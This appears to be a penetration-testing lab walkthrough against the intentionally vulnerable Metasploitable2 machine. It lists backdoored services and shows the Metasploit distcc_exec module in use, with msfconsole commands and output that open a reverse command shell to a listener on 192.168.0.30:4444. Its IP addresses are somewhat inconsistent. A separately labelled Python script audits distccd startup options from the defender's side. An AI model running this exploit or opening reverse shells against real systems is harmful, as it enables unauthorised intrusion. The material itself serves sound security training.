Kali: 192.168.0.20/24

MSFable: 192.168.0.51/24

Vulnerable services:

  • samba -> usermap_script
  • irc -> unreal_ircd_3281_backdoor
  • ftp -> vsftpd_234_backdoor
  • Services: Unintentional Backdoors

    In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. The first of these installed on Metasploitable2 is distccd. This program makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below.

     

    msfconsole

    msf > use exploit/unix/misc/distcc_exec
    msf  exploit(distcc_exec) > set RHOST 192.168.99.131
    msf  exploit(distcc_exec) > exploit

    msf > use exploit/unix/misc/distcc_exec
    msf exploit(distcc_exec) > show options

    Module options (exploit/unix/misc/distcc_exec):

    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST                   yes       The target address
    RPORT  3632             yes       The target port

    Exploit target:

    Id  Name
    --  ----
    0   Automatic Target

    msf exploit(distcc_exec) > set rhost 192.168.0.51
    rhost => 192.168.0.51
    msf exploit(distcc_exec) > exploit

    [*] Started reverse TCP double handler on 192.168.0.30:4444
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo 8gFZ6i8kVEx29A4c;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket B
    [*] B: "8gFZ6i8kVEx29A4c\r\n"
    [*] Matching...
    [*] A is input...
    [*] Command shell session 2 opened (192.168.0.30:4444 -> 192.168.0.51:57642) at 2016-04-20 21:36:24 -0400

    id
    uid=1(daemon) gid=1(daemon) groups=1(daemon)
    whoami
    daemon
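
An added example, not part of the original page or of distcc: a defender-side audit of how distccd was started, since the exposure shown above comes down to who may connect and on which interface. It assumes distccd's `--allow`/`-a` and `--listen` options; the finding codes, the `MIN_PREFIX` threshold and the sample command lines are constructed for illustration.

```python
import ipaddress
import shlex

MIN_PREFIX = 16  # assumed policy threshold: networks wider than a /16 are flagged

# Constructed sample command lines (not taken from the page).
SAMPLES = [
    "distccd --daemon --user daemon",
    "distccd --daemon --allow 192.168.0.20 --listen 192.168.0.51",
    "distccd --daemon -a 0.0.0.0/0 --listen 0.0.0.0",
]

def audit_distccd(cmdline):
    """Return a sorted list of finding codes for one distccd command line."""
    args = shlex.split(cmdline)
    allows, listen, i = [], None, 0
    while i < len(args):
        arg = args[i]
        # Options may be written "--allow NET", "-a NET" or "--allow=NET".
        if arg in ("--allow", "-a", "--listen") and i + 1 < len(args):
            name, value, i = arg, args[i + 1], i + 1
        elif arg.startswith(("--allow=", "--listen=")):
            name, value = arg.split("=", 1)
        else:
            name = None
        if name == "--listen":
            listen = value
        elif name is not None:
            allows.append(value)
        i += 1
    findings = set()
    if not allows:
        findings.add("NO_ALLOW")  # no client restriction given on the command line
    for spec in allows:
        try:
            # strict=False tolerates host bits; dotted masks (/255.255.255.0) parse too.
            net = ipaddress.ip_network(spec, strict=False)
        except ValueError:
            findings.add("ALLOW_UNPARSED")  # review by hand rather than guess
            continue
        if net.prefixlen == 0:
            findings.add("ALLOW_ANY")  # every address is an allowed client
        elif net.prefixlen < MIN_PREFIX:
            findings.add("ALLOW_WIDE")
    if listen is None or listen in ("0.0.0.0", "::"):
        findings.add("LISTEN_ALL")  # reachable on every interface
    return sorted(findings)

if __name__ == "__main__":
    for line in SAMPLES:
        print(audit_distccd(line), "<-", line)
```

An empty list means the command line both restricts clients and binds a specific address; any other result is worth a look before the host shares a network with untrusted machines.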

 

Check out here: